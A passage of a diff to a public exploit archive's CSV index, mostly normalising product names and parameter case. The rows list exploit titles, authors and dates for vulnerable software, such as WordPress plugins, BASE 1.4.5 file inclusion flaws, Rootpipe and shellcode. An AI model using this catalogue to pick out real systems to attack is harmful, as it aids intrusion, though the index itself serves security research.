Forgery",2012-02-10,DisK0nn3cT,php,webapps,0 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0 -36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post-Authenticated Remote Root Exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 -36691,platforms/php/webapps/36691.txt,"Wordpress Windows Desktop and iPhone Photo Uploader Plugin - Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 -36692,platforms/osx/local/36692.py,"Mac OSX < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 +36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post-Authentication Remote Root Exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 +36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin - Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 +36692,platforms/osx/local/36692.py,"Apple Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 36693,platforms/php/webapps/36693.txt,"RabbitWiki - 'title' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 - SQL Injection / Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0 36695,platforms/php/webapps/36695.txt,"Zimbra - 'view' Parameter Cross-Site Scripting",2012-02-13,sonyy,php,webapps,0 36696,platforms/php/webapps/36696.txt,"Nova CMS - administrator/modules/moduleslist.php id Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36697,platforms/php/webapps/36697.txt,"Nova CMS - optimizer/index.php fileType Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36698,platforms/php/webapps/36698.txt,"Nova CMS - includes/function/gets.php filename Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36698,platforms/php/webapps/36698.txt,"Nova CMS - includes/function/gets.php Filename Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36699,platforms/php/webapps/36699.txt,"Nova CMS - includes/function/usertpl.php conf[blockfile] Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36701,platforms/lin_x86/shellcode/36701.c,"Linux/x86 - Create 'my.txt' Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0 -36702,platforms/php/webapps/36702.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_db_setup.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36703,platforms/php/webapps/36703.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36704,platforms/php/webapps/36704.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_display.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36705,platforms/php/webapps/36705.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_form.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36706,platforms/php/webapps/36706.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_main.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36707,platforms/php/webapps/36707.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_local_rules.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36708,platforms/php/webapps/36708.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_logout.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36709,platforms/php/webapps/36709.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_main.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36710,platforms/php/webapps/36710.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_maintenance.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36711,platforms/php/webapps/36711.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_payload.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36712,platforms/php/webapps/36712.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - help/base_setup_help.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36713,platforms/php/webapps/36713.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_action.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36714,platforms/php/webapps/36714.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_cache.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36715,platforms/php/webapps/36715.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_db.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36716,platforms/php/webapps/36716.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_include.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36717,platforms/php/webapps/36717.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_html.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36718,platforms/php/webapps/36718.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_query.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36719,platforms/php/webapps/36719.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_criteria.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36720,platforms/php/webapps/36720.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_query.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36702,platforms/php/webapps/36702.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_db_setup.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36703,platforms/php/webapps/36703.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_common.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36704,platforms/php/webapps/36704.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_display.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36705,platforms/php/webapps/36705.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_form.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36706,platforms/php/webapps/36706.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_main.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36707,platforms/php/webapps/36707.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_local_rules.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36708,platforms/php/webapps/36708.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_logout.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36709,platforms/php/webapps/36709.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_main.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36710,platforms/php/webapps/36710.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_maintenance.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36711,platforms/php/webapps/36711.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_payload.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36712,platforms/php/webapps/36712.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - help/base_setup_help.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36713,platforms/php/webapps/36713.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_action.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36714,platforms/php/webapps/36714.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_cache.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36715,platforms/php/webapps/36715.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_db.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36716,platforms/php/webapps/36716.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_include.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36717,platforms/php/webapps/36717.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_html.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36718,platforms/php/webapps/36718.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_query.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36719,platforms/php/webapps/36719.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_criteria.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36720,platforms/php/webapps/36720.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_query.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36721,platforms/php/webapps/36721.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - setup/base_conf_contents.php Multiple Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36722,platforms/php/webapps/36722.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_common.inc.php GLOBALS[user_session_path] Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36723,platforms/php/webapps/36723.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - setup/setup2.php ado_inc_PHP Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36724,platforms/php/webapps/36724.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36725,platforms/php/webapps/36725.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_alert.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36726,platforms/php/webapps/36726.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36727,platforms/php/webapps/36727.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_alerts.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36728,platforms/php/webapps/36728.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_class.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36729,platforms/php/webapps/36729.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36730,platforms/php/webapps/36730.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ipaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36731,platforms/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_iplink.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36732,platforms/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ports.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36733,platforms/php/webapps/36733.txt,"Wordpress Plugin 'WP Mobile Edition' 2.7 - Remote File Disclosure",2015-04-13,"Khwanchai Kaewyos",php,webapps,0 -36735,platforms/php/webapps/36735.txt,"Wordpress Duplicator 0.5.14 Plugin - SQL Injection / Cross-Site Request Forgery",2015-04-13,"Claudio Viviani",php,webapps,0 +36724,platforms/php/webapps/36724.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36725,platforms/php/webapps/36725.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_alert.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36726,platforms/php/webapps/36726.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_common.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36727,platforms/php/webapps/36727.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_alerts.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36728,platforms/php/webapps/36728.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_class.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36729,platforms/php/webapps/36729.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_common.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36730,platforms/php/webapps/36730.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ipaddr.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36731,platforms/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_iplink.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36732,platforms/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ports.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36733,platforms/php/webapps/36733.txt,"WordPress Plugin 'WP Mobile Edition' 2.7 - Remote File Disclosure",2015-04-13,"Khwanchai Kaewyos",php,webapps,0 +36735,platforms/php/webapps/36735.txt,"WordPress Duplicator 0.5.14 Plugin - SQL Injection / Cross-Site Request Forgery",2015-04-13,"Claudio Viviani",php,webapps,0 36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0 -36738,platforms/php/webapps/36738.txt,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 Plugin - Arbitrary File Upload (1)",2015-04-13,"Claudio Viviani",php,webapps,0 +36738,platforms/php/webapps/36738.txt,"WordPress N-Media Website Contact Form with File Upload 1.3.4 Plugin - Arbitrary File Upload (1)",2015-04-13,"Claudio Viviani",php,webapps,0 36746,platforms/linux/local/36746.c,"Apport/Abrt (Ubuntu / Fedora) - Privilege Escalation",2015-04-14,"Tavis Ormandy",linux,local,0 -36761,platforms/php/webapps/36761.txt,"Wordpress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80 -36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - (PoC)",2015-04-13,sleepya,linux,dos,0 +36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80 +36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 (x86) - (PoC)",2015-04-13,sleepya,linux,dos,0 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0 36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0 36744,platforms/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow",2015-04-13,Metasploit,windows,remote,0 -36745,platforms/osx/local/36745.rb,"Mac OSX - 'Rootpipe' Privilege Escalation",2015-04-13,Metasploit,osx,local,0 -36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_sensor.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_uaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36751,platforms/php/webapps/36751.txt,"Wordpress Video Gallery 2.8 Plugin - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80 +36745,platforms/osx/local/36745.rb,"Apple Mac OS X - 'Rootpipe' Privilege Escalation",2015-04-13,Metasploit,osx,local,0 +36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_sensor.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_time.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_uaddr.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36751,platforms/php/webapps/36751.txt,"WordPress Video Gallery 2.8 Plugin - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80 36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0 -36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_user.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_user.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36756,platforms/windows/remote/36756.html,"Samsung iPOLiS - ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0 -36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php' BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php' base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 -36762,platforms/php/webapps/36762.txt,"Wordpress MiwoFTP Plugin 1.0.5 - Multiple Cross-Site Request Forgery Cross-Site Scripting Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80 -36763,platforms/php/webapps/36763.txt,"Wordpress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Creation Exploit (Remote Code Execution)",2015-04-14,LiquidWorm,php,webapps,80 +36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 - Multiple Cross-Site Request Forgery Cross-Site Scripting Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80 +36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Creation Exploit (Remote Code Execution)",2015-04-14,LiquidWorm,php,webapps,80 36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' Parameter HTML Injection",2012-02-13,sonyy,php,webapps,0 36765,platforms/php/webapps/36765.txt,"Powie pFile 1.02 - pfile/kommentar.php filecat Parameter Cross-Site Scripting",2012-02-13,indoushka,php,webapps,0 36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 - pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0 @@ -33178,10 +33181,10 @@ id,file,description,date,author,platform,type,port 36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal - team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 36772,platforms/cgi/webapps/36772.txt,"EditWrxLite CMS - 'wrx.cgi' Remote Command Execution",2012-02-13,chippy1337,cgi,webapps,0 36773,platforms/windows/dos/36773.c,"Microsoft Windows - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0 -36774,platforms/php/webapps/36774.txt,"Wordpress MiwoFTP Plugin 1.0.5 - Arbitrary File Download (1)",2015-04-15,"Necmettin COSKUN",php,webapps,0 +36774,platforms/php/webapps/36774.txt,"WordPress MiwoFTP Plugin 1.0.5 - Arbitrary File Download (1)",2015-04-15,"Necmettin COSKUN",php,webapps,0 36807,platforms/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",php,webapps,80 36776,platforms/windows/dos/36776.py,"MS Windows (HTTP.sys) - HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 -36777,platforms/php/webapps/36777.txt,"Wordpress Ajax Store Locator 1.2 Plugin - SQL Injection",2015-04-16,"Claudio Viviani",php,webapps,80 +36777,platforms/php/webapps/36777.txt,"WordPress Ajax Store Locator 1.2 Plugin - SQL Injection",2015-04-16,"Claudio Viviani",php,webapps,80 36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve _/bin/sh_ Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0 36779,platforms/win_x86/shellcode/36779.c,"Win32/XP SP3 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 36780,platforms/win_x86/shellcode/36780.c,"Win32/XP SP3 - Restart computer Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 @@ -33189,7 +33192,7 @@ id,file,description,date,author,platform,type,port 36782,platforms/linux/local/36782.sh,"Apport 2.14.1 (Ubuntu 14.04.2) - Privilege Escalation",2015-04-17,"Ricardo F. Teixeira",linux,local,0 36784,platforms/php/webapps/36784.txt,"11in1 CMS 1.2.1 - 'index.php' class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - admin/index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 -36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Admin Password Manipulation Cross-Site Request Forgery",2012-02-15,"High-Tech Bridge SA",php,webapps,0 +36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Admin Password manipulation Cross-Site Request Forgery",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36787,platforms/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross-Site Scripting",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36788,platforms/windows/dos/36788.txt,"Oracle - Outside-In DOCX File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0 36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial Of Service",2011-12-18,anonymous,php,dos,0 @@ -33202,21 +33205,21 @@ id,file,description,date,author,platform,type,port 36797,platforms/ios/webapps/36797.txt,"Mobile Drive HD 1.8 - File Include Web",2015-04-21,Vulnerability-Lab,ios,webapps,0 36798,platforms/ios/webapps/36798.txt,"Photo Manager Pro 4.4.0 iOS - Code Execution",2015-04-21,Vulnerability-Lab,ios,webapps,0 36799,platforms/bsd/local/36799.c,"OpenBSD 5.6 - Multiple Local Kernel Panics",2015-04-21,nitr0us,bsd,local,0 -36800,platforms/php/webapps/36800.txt,"Wordpress NEX-Forms < 3.0 Plugin - SQL Injection",2015-04-21,"Claudio Viviani",php,webapps,0 -36801,platforms/php/webapps/36801.txt,"Wordpress MiwoFTP Plugin 1.0.5 - Arbitrary File Download (2)",2015-04-21,"dadou dz",php,webapps,0 -36802,platforms/php/webapps/36802.txt,"Wordpress Tune Library Plugin 1.5.4 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 +36800,platforms/php/webapps/36800.txt,"WordPress NEX-Forms < 3.0 Plugin - SQL Injection",2015-04-21,"Claudio Viviani",php,webapps,0 +36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin 1.0.5 - Arbitrary File Download (2)",2015-04-21,"dadou dz",php,webapps,0 +36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 - (mod_copy) Remote Command Execution",2015-04-21,R-73eN,linux,remote,0 36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0 -36805,platforms/php/webapps/36805.txt,"Wordpress Community Events Plugin 1.3.5 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 +36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 36808,platforms/windows/remote/36808.rb,"Adobe Flash Player - copyPixelsToByteArray Integer Overflow",2015-04-21,Metasploit,windows,remote,0 -36809,platforms/php/remote/36809.rb,"Wordpress Reflex Gallery Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 -36810,platforms/php/remote/36810.rb,"Wordpress N-Media Website Contact Form Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 -36811,platforms/php/remote/36811.rb,"Wordpress Creative Contact Form Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 -36812,platforms/php/remote/36812.rb,"Wordpress Work The Flow Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 -36813,platforms/hardware/local/36813.txt,"ADB - Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0 -36814,platforms/osx/dos/36814.c,"Mac OSX - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0 +36809,platforms/php/remote/36809.rb,"WordPress Reflex Gallery Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 +36810,platforms/php/remote/36810.rb,"WordPress N-Media Website Contact Form Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 +36811,platforms/php/remote/36811.rb,"WordPress Creative Contact Form Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 +36812,platforms/php/remote/36812.rb,"WordPress Work The Flow Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 +36813,platforms/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",hardware,local,0 +36814,platforms/osx/dos/36814.c,"Apple Mac OS X - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80 -36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 'url' Parameter URI Redirection",2012-02-18,sonyy,php,webapps,0 +36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 'url' Parameter URI redirection",2012-02-18,sonyy,php,webapps,0 36849,platforms/php/webapps/36849.txt,"VOXTRONIC Voxlog Professional 3.7.x - get.php v Parameter Arbitrary File Access",2012-02-20,"J. Greil",php,webapps,0 36850,platforms/php/webapps/36850.txt,"VOXTRONIC Voxlog Professional 3.7.x - userlogdetail.php idclient Parameter SQL Injection",2012-02-20,"J. Greil",php,webapps,0 36851,platforms/php/webapps/36851.txt,"F*EX 20100208/20111129-2 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-20,muuratsalo,php,webapps,0 @@ -33226,8 +33229,8 @@ id,file,description,date,author,platform,type,port 36820,platforms/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0 36821,platforms/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution",2015-04-23,"TUNISIAN CYBER",php,webapps,0 36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH Egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0 -36823,platforms/php/webapps/36823.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated SQL Injection (1)",2015-04-23,"Felipe Molina",php,webapps,0 -36824,platforms/php/webapps/36824.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated 